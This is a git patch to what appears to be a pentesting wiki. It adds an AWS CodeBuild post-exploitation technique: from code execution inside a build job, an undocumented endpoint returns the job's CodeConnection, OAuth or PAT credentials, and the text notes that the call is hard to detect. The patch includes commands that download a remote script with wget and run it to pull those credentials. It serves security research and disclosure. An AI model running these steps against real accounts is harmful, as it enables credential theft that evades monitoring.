From a0ce4e47be8ffa8389045a77a680d315b45ec24a Mon Sep 17 00:00:00 2001
From: Thomas Preece <github@thomaspreece.com>
Date: Wed, 1 Apr 2026 08:01:37 +0100
Subject: [PATCH] Add new CodeBuild Credential leakage technique

---
 .../aws-codebuild-token-leakage.md                   | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
index 9641fa7f5..f847dadf5 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -10,6 +10,18 @@ First, check if there are any source credentials configured that you could leak:
 aws codebuild list-source-credentials
 ```
 
+### Via RCE in CodeBuild Job
+
+From within a CodeBuild job, you can hit an undocumented AWS CodeBuild API endpoint which will return you the credentials used by CodeBuild. This can be used to obtain the credentials the CodeBuild job was setup with e.g. AWS CodeConnection credentials, OAUTH or PAT credentials. The CodeBuild job does not need to be privileged to hit this endpoint and it is also hard to detect in logging and monitoring as CodeBuild itself calls this endpoint several times on startup. 
+
+The technique is explained further in [https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/](https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/) but in summary to obtain credentials within the CodeBuild job you just need to run the following:
+
+```
+python -m pip install botocore boto3 requests
+wget https://raw.githubusercontent.com/thomaspreece/AWS-CodeFactoryTokenService-API/refs/heads/main/GetBuildInfo.py
+python ./GetBuildInfo.py
+```
+
 ### Via Docker Image
 
 If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.